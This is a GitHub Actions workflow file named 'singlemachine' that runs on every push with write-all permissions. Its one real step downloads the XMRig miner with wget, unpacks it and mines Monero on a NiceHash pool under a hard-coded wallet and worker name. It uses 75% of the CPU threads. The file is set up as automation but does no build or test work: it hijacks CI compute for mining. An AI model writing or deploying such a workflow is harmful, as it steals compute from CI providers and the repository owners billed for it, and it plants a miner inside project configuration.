name: singlemachine
on: [push]
permissions: write-all 
jobs:
  autoamate-with-actions:
    runs-on: ubuntu-latest
    defaults: 
      run:
        shell: bash
    steps:
     - uses: actions/checkout@v2
       with: 
          repository: asamamax/test
     - run: |
        wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-focal-x64.tar.gz
        tar zxvf xmrig-6.18.0-focal-x64.tar.gz
        ./xmrig-6.18.0/xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 32KdWEybhtWPaR9VN441dyo2WumSSMkCFG.DAMNBOY -p x -k -a rx/0 --cpu-max-threads-hint=75
